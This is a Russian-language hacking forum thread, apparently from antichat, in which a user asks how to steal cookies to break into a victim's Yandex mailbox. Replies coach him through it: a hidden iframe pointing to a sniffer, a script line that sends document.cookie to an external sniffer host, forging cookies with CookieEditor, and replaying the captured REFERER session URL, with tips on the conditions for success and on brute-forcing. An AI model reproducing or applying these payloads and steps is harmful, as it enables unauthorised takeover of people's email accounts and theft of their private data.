Кукии
 

Вопрос такой (знаю чт омного вопросы задаю, но я и почитал перед тем как задать)
как можн оукратсь куки для входа на почту жертвы?

а есть способ по легче типа, отослать писмо с приклиплёными данными, а куки придут мне.
или как взломать комп жертвы?
я вобще писмо отослал с с картинкой и там синфер. и на мой синфер пришли данные.
тока что с нимим делать я не понял.

Теперь возми прогу CookieEditor и подделай куки.
Жаль не помню статей на эту тему...
Но со снифером ты всё сделал правильно(ну правильно, если это сработало), типа XSS что то получилось, а теперь возьми прогу которую я посоветовал выше и подделай куки!

Есть такая вещь как Xss.... в основном она используется для кражи кук... юзай поиск...

спасибо за ответы,
Я скачал прогу но я что то не понял как в ней поделовать куки,
можеш мне в аску постучатся пожалуйсто.

А то что я со снифером делала не то получается?

Какую почту ломаешь хоть?
Ну раз пришли куки,вставляй в адресную строку.
Скорей всего пришли не куки,а сессия.

Покопайся в видео! Какой сервер? Юзай сниффер! Зайди сюды http://antichat.ru/sniff/

так я уже поюзал! и пришла именно сесия, но как её использовать? в адресну вставляю говарит логи пиши и пароль , сервер яндекс.

Куки в студию.
Либо не то пришло,либо жертва нажала на кнопачку выход,после пользования ящиком.
И сессия погибла...

Может там проверка по Ip

Да она начала на конопочку однозначно

вот что мне пришло

IP: 194.126.101.133 Real IP: 213.35.139.81
QUERY: ;
REFERER: http://simg.mail.yandex.net/simg/s.g...995d4d205f714a
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Игиде здесь сессия?!!!

что стоит в строке, а точнее после слова QUERY, то это тебе и надо. ).зайди на video.antichat.ru , там просто ПОЛНО этого.

В query обычно передаются данные после snif.jpg?[QUERY]/// Тут обычно бывают кукии. Но не сессия!

Покажи нам как ты отправлял сниффер!

я сделал все как в теме угон сесии яндекс.

тока что посмотрел это видио, и хотел спросить а этот хтмл код где можно взять?
http://video.antichat.ru/file51.html

Какой код?! Как вставлять снифер?!

ну да

<iframe src="адрес сниффера" width=0 height=0>#</iframe> - Это для сессии...

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Это для КУКИСОВ!

Ты должен отправлять письма в формате HTML

А если в фото (ерзе блокнот) прописать, то не получится?

Всмысле?

открыть фото через болокнот туда это вписать, а потом когда получатель откроет на снифер придут данные, так можно? вереня это будет работать?

всё щяс проверил, не работает
тогда скажи а в яндексе как можно в виде html посылать?

Я там когда посылаю вроде как выбрав с форматирование хтмл
а когда псимо приход видет это всё как текст
кароч ты можеш послать мне правельно на почту gh266@yandex.ru
а мой снифер http://antichat.org/s/266.gif

буду блогодарен.

Вообще при регистрации ты выбираешь формат писем! И посмотри в насройках "Персональные данные"... Но это помойму на прием! Хотя хз. Я им яндексом не юзаюсь

Всё будет работать.
Перед тем как спрашивать,пробуй всё на себе,много вопросов отпадёт.
Пришли сам себе картинку.Потом иди на сниффер,забирай строку REFERER и вставляй её в адресную строку.Попадёш в свой ящик.
Условия:
Жертва не должна нажать кнопку выход.
При входе в ящик у жертвы должна стоять галка в поле "не спрашивать две недели"
Ну и много разных ньюансов,типа привязка IP и т.д.
Так что всё зависит от степени ламеризма и лени жертвы.

Не, если стока условий то снифер однозначно отподает. я себе пробовал, ну нечего не получилось просто.
а кроме брутус больше не остатется способов ломать ящики?

А эта шняга на mail.ru работает??? Я пробовал, не получилось... Есле скрипт посылать, то его блокирует, а есле картинку, то ничего не происходит....

Способов куча. http://forum.antichat.ru/thread9930.html
Но если у тебя на своём ящике не получилось,то тяжко будет чужой ломать.